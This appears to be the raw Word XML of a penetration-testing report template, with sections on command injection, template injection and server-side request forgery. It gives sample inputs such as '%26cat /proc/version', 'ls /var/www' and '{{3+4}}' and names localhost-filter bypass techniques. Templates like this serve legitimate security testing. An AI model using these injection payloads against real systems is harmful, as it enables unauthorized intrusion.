            <w:r w:rsidRPr="00632E6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6A64299" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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E5AE45E" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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355B177" w14:textId="77777777" w:rsidR="00E36E91" w:rsidRPr="00DB0B95" w:rsidRDefault="00E36E91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677C4" w:rsidRPr="00DB0B95" w14:paraId="3F7934C9" w14:textId="77777777" w:rsidTr="00870102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6EF40BF5" w14:textId="77112BB6" w:rsidR="008677C4" w:rsidRPr="001B44C5" w:rsidRDefault="008677C4" w:rsidP="0087010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677C4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>URL Encoding-Based Payloads Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237BA786" w14:textId="1D754244" w:rsidR="008677C4" w:rsidRDefault="008677C4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8677C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 Payloads Used: %26cat /proc/version,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9D67A59" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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7C8E76B" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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4208ACA" w14:textId="77777777" w:rsidR="00E36E91" w:rsidRDefault="00E36E91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8677C4" w:rsidRPr="00DB0B95" w14:paraId="07F7900D" w14:textId="77777777" w:rsidTr="00870102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27EACED9" w14:textId="157A6499" w:rsidR="008677C4" w:rsidRPr="001B44C5" w:rsidRDefault="008677C4" w:rsidP="0087010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677C4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>POST Request Interception &amp; Modification Attempted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="760E2DC6" w14:textId="3C3EAA17" w:rsidR="008677C4" w:rsidRDefault="008677C4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8677C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Injected Commands: ls /var/www,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8FF080F" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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91B3286" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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AE4D622" w14:textId="77777777" w:rsidR="00E36E91" w:rsidRDefault="00E36E91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8677C4" w:rsidRPr="00DB0B95" w14:paraId="01FDEFA9" w14:textId="77777777" w:rsidTr="00870102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3F5DF0F4" w14:textId="3A7175F7" w:rsidR="008677C4" w:rsidRPr="007930E4" w:rsidRDefault="00191830" w:rsidP="0087010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91830">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Response Indicating Command Execution?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F19D41" w14:textId="10BB510D" w:rsidR="008677C4" w:rsidRDefault="008677C4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191830" w:rsidRPr="0019183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Extracted Output if applicable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D2A8D91" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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694BF9A" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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485F467" w14:textId="77777777" w:rsidR="00E36E91" w:rsidRDefault="00E36E91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8677C4" w:rsidRPr="00DB0B95" w14:paraId="0400F646" w14:textId="77777777" w:rsidTr="00870102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1C72BFB4" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4" w:rsidP="0087010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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="793116C2" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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A13369C" w14:textId="77777777" w:rsidR="00E36E91" w:rsidRDefault="00E36E91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B42FD6C" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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8677C4" w:rsidRPr="00DB0B95" w14:paraId="37F1C338" w14:textId="77777777" w:rsidTr="00870102">
        <w:trPr>
          <w:trHeight w:val="1250"/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33F48D68" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00BC63D1" w:rsidRDefault="008677C4" w:rsidP="0087010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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47E1AE8A" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00FF267C" w:rsidRDefault="008677C4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[*If Any]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008677C4" w:rsidRPr="00DB0B95" w14:paraId="716967A8" w14:textId="77777777" w:rsidTr="00870102">
        <w:trPr>
          <w:trHeight w:val="1250"/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0DB0213" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="0087010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6E635F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CEB7EB9" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4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677C4" w:rsidRPr="00DB0B95" w14:paraId="2F62241A" w14:textId="77777777" w:rsidTr="00870102">
        <w:trPr>
          <w:trHeight w:val="1250"/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73BA79F6" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4" w:rsidP="0087010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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53E5BBCA" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4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677C4" w:rsidRPr="00DB0B95" w14:paraId="197FCB1C" w14:textId="77777777" w:rsidTr="00870102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630FCC9D" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="0087010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Tools/Services Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="702994B3" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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63A85ED" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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E3081FC" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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5F74C74" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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B3CE8EA" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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AC02CB4" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4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8677C4" w:rsidRPr="00DB0B95" w14:paraId="4A6DEE8A" w14:textId="77777777" w:rsidTr="00870102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69FC338" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4" w:rsidP="0087010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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A111136" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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BCE249B" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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E5EF591" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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BFFC2C6" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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DDFEC96" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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2841B58" w14:textId="77777777" w:rsidR="008677C4" w:rsidRDefault="008677C4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119EB8B" w14:textId="77777777" w:rsidR="008677C4" w:rsidRPr="00DB0B95" w:rsidRDefault="008677C4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7D31FA9E" w14:textId="77777777" w:rsidR="00A23D96" w:rsidRDefault="00A23D96" w:rsidP="000947B4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191830" w:rsidRPr="00A51A96" w14:paraId="50876A76" w14:textId="77777777" w:rsidTr="00B23234">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1BF2E6A8" w14:textId="6846F045" w:rsidR="00191830" w:rsidRPr="003C713F" w:rsidRDefault="00191830" w:rsidP="00972D9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8.8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191830">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Server-side Template Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="360C9668" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00B23234" w:rsidRDefault="00191830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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="00191830" w:rsidRPr="00DB0B95" w14:paraId="088CF182" w14:textId="77777777" w:rsidTr="00B23234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C293E48" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="00B232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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35473A1B" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830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91830" w:rsidRPr="00DB0B95" w14:paraId="79C81136" w14:textId="77777777" w:rsidTr="00B23234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2219B795" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="00B232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Target </w:t>
            </w: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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FA4A12D" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830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91830" w:rsidRPr="00DB0B95" w14:paraId="0F696AAA" w14:textId="77777777" w:rsidTr="00B23234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0B494AF8" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="00B232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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15CDB36F" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830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91830" w:rsidRPr="00DB0B95" w14:paraId="7449C47A" w14:textId="77777777" w:rsidTr="00B23234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A2DBE38" w14:textId="658C54D9" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00273535" w:rsidP="00B232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73535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SSTI in Plain Text Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27E7489B" w14:textId="5F3F6AC1" w:rsidR="00191830" w:rsidRPr="00632E60" w:rsidRDefault="00191830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32E6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273535" w:rsidRPr="0027353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Tested Expressions: {{3+4}}, ${3+4}, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00632E6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ED9291D" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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C0B3054" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830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91830" w:rsidRPr="00DB0B95" w14:paraId="315CE476" w14:textId="77777777" w:rsidTr="00B23234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4D0384D7" w14:textId="72D56E72" w:rsidR="00191830" w:rsidRPr="001B44C5" w:rsidRDefault="00273535" w:rsidP="00B232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73535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SSTI in Code Context Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B0C0426" w14:textId="3616D881" w:rsidR="00191830" w:rsidRDefault="00191830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273535" w:rsidRPr="0027353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Observed Output for Injected Expressions: {{/exit}},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707E9B1" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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59CF481" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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191830" w:rsidRPr="00DB0B95" w14:paraId="2C0E066B" w14:textId="77777777" w:rsidTr="00B23234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3B55669" w14:textId="73E03D94" w:rsidR="00191830" w:rsidRPr="001B44C5" w:rsidRDefault="00273535" w:rsidP="00B232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73535">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Detected Template Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EC0E849" w14:textId="4DD2355D" w:rsidR="00191830" w:rsidRDefault="00191830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273535" w:rsidRPr="0027353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Jinja2, Thymeleaf, EJS, Velocity,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99C392B" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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94A222D" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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191830" w:rsidRPr="00DB0B95" w14:paraId="133BD38E" w14:textId="77777777" w:rsidTr="00B23234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31190A44" w14:textId="6535BC69" w:rsidR="00191830" w:rsidRPr="007930E4" w:rsidRDefault="00273535" w:rsidP="00B232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73535">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Successful SSTI Exploit?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28ABB2EA" w14:textId="65D0DBEA" w:rsidR="00191830" w:rsidRDefault="00191830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273535" w:rsidRPr="0027353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 Payloads Used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DFB772C" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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317CDB8" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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73535" w:rsidRPr="00DB0B95" w14:paraId="646759A8" w14:textId="77777777" w:rsidTr="00B23234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3EC2762" w14:textId="5506D285" w:rsidR="00273535" w:rsidRPr="00273535" w:rsidRDefault="00273535" w:rsidP="00B232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73535">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Remote Code Execution (RCE) Achieved?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B3943C1" w14:textId="77777777" w:rsidR="00273535" w:rsidRDefault="00273535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27353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Exploit Code &amp; Output if successful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FC2ADA3" w14:textId="77777777" w:rsidR="00B657FB" w:rsidRDefault="00B657FB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5AFCD65" w14:textId="5DDBFCBE" w:rsidR="00B23234" w:rsidRDefault="00B23234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191830" w:rsidRPr="00DB0B95" w14:paraId="1EFB8425" w14:textId="77777777" w:rsidTr="00B23234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792F9B8A" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830" w:rsidP="00B232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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="326EFCBD" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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6E29F06" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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191830" w:rsidRPr="00DB0B95" w14:paraId="5A0A65BD" w14:textId="77777777" w:rsidTr="00B23234">
        <w:trPr>
          <w:trHeight w:val="1070"/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3209468D" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00BC63D1" w:rsidRDefault="00191830" w:rsidP="00B232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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E45129" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00FF267C" w:rsidRDefault="00191830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[*If Any]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00191830" w:rsidRPr="00DB0B95" w14:paraId="50A7260D" w14:textId="77777777" w:rsidTr="00B23234">
        <w:trPr>
          <w:trHeight w:val="1070"/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BEDE750" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="00B232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6E635F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50CFD83B" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830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91830" w:rsidRPr="00DB0B95" w14:paraId="40904140" w14:textId="77777777" w:rsidTr="00B23234">
        <w:trPr>
          <w:trHeight w:val="800"/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376B99AA" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830" w:rsidP="00B232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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35F2D98A" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830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91830" w:rsidRPr="00DB0B95" w14:paraId="699B4E19" w14:textId="77777777" w:rsidTr="00B23234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7923FDFA" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="00B232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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74D355D4" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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A90A983" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="176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AC3FE66" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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C0379E7" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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C686D82" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17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D3DDEDC" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830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91830" w:rsidRPr="00DB0B95" w14:paraId="7DAAE873" w14:textId="77777777" w:rsidTr="00B23234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06100D6C" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830" w:rsidP="00B2323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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30DF90C6" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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BC1B9AD" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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88DD46A" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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41A9C3C" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830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BE86656" w14:textId="77777777" w:rsidR="00191830" w:rsidRPr="00DB0B95" w:rsidRDefault="00191830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33D4E7FD" w14:textId="77777777" w:rsidR="00191830" w:rsidRDefault="00191830" w:rsidP="000947B4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5C4F96" w:rsidRPr="00A51A96" w14:paraId="5002A491" w14:textId="77777777" w:rsidTr="00D44229">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0BE44A4A" w14:textId="65A955CF" w:rsidR="005C4F96" w:rsidRPr="003C713F" w:rsidRDefault="005C4F96" w:rsidP="00972D9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8.9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5C4F96">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Server-Side Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D337BAA" w14:textId="77777777" w:rsidR="00214A04" w:rsidRPr="00D44229" w:rsidRDefault="00214A04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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w14:paraId="21AEB5C1" w14:textId="77777777" w:rsidTr="00D44229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8199A3A" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="00D4422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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="693E9A34" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96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C4F96" w:rsidRPr="00DB0B95" w14:paraId="39E2F933" w14:textId="77777777" w:rsidTr="00D44229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467F6011" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="00D4422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Target </w:t>
            </w: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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F95336F" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96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C4F96" w:rsidRPr="00DB0B95" w14:paraId="2F0D7074" w14:textId="77777777" w:rsidTr="00D44229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37EE521" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96" w:rsidP="00D4422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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46290764" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F96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C4F96" w:rsidRPr="00DB0B95" w14:paraId="67D1CECD" w14:textId="77777777" w:rsidTr="00D44229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319FE5E9" w14:textId="56F4FA2D" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="00787E13" w:rsidP="00D4422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87E13">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>External Resource Access Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E43F854" w14:textId="16BA51E3" w:rsidR="005C4F96" w:rsidRPr="00632E60" w:rsidRDefault="005C4F96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32E6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787E13" w:rsidRPr="00787E1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Successful Attempts</w:t>
            </w:r>
            <w:r w:rsidR="0094271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,</w:t>
            </w:r>
            <w:r w:rsidR="00787E13" w:rsidRPr="00787E1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 if any</w:t>
            </w:r>
            <w:r w:rsidRPr="00632E6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09AA2CD" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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7648F13" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRPr="00DB0B95" w:rsidRDefault="005C4F9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C4F96" w:rsidRPr="00DB0B95" w14:paraId="3362D1C9" w14:textId="77777777" w:rsidTr="00D44229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76F774E6" w14:textId="1DE9801A" w:rsidR="005C4F96" w:rsidRPr="001B44C5" w:rsidRDefault="00787E13" w:rsidP="00D4422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87E13">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Internal Resource Access Attempted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E4C8103" w14:textId="564F279C" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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787E13" w:rsidRPr="00787E1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List of Internal Services/Files Accessed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7FE0178" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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68B26F8" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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C4F96" w:rsidRPr="00DB0B95" w14:paraId="3EEFB758" w14:textId="77777777" w:rsidTr="00D44229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7116CFC1" w14:textId="0A783952" w:rsidR="005C4F96" w:rsidRPr="001B44C5" w:rsidRDefault="00787E13" w:rsidP="00D4422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87E13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Bypassed Localhost Filters?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="132D00BF" w14:textId="7CDA258C" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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787E13" w:rsidRPr="00787E1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Techniques Used – Hex, Octal, IPv6,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0826CF0" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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69A0CF3" w14:textId="77777777" w:rsidR="005C4F96" w:rsidRDefault="005C4F9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C4F96" w:rsidRPr="00DB0B95" w14:paraId="39023DC7" w14:textId="77777777" w:rsidTr="00D44229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0D59887C" w14:textId="13557D56" w:rsidR="005C4F96" w:rsidRPr="007930E4" w:rsidRDefault="0081541E" w:rsidP="00D4422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1541E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Injection Points Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
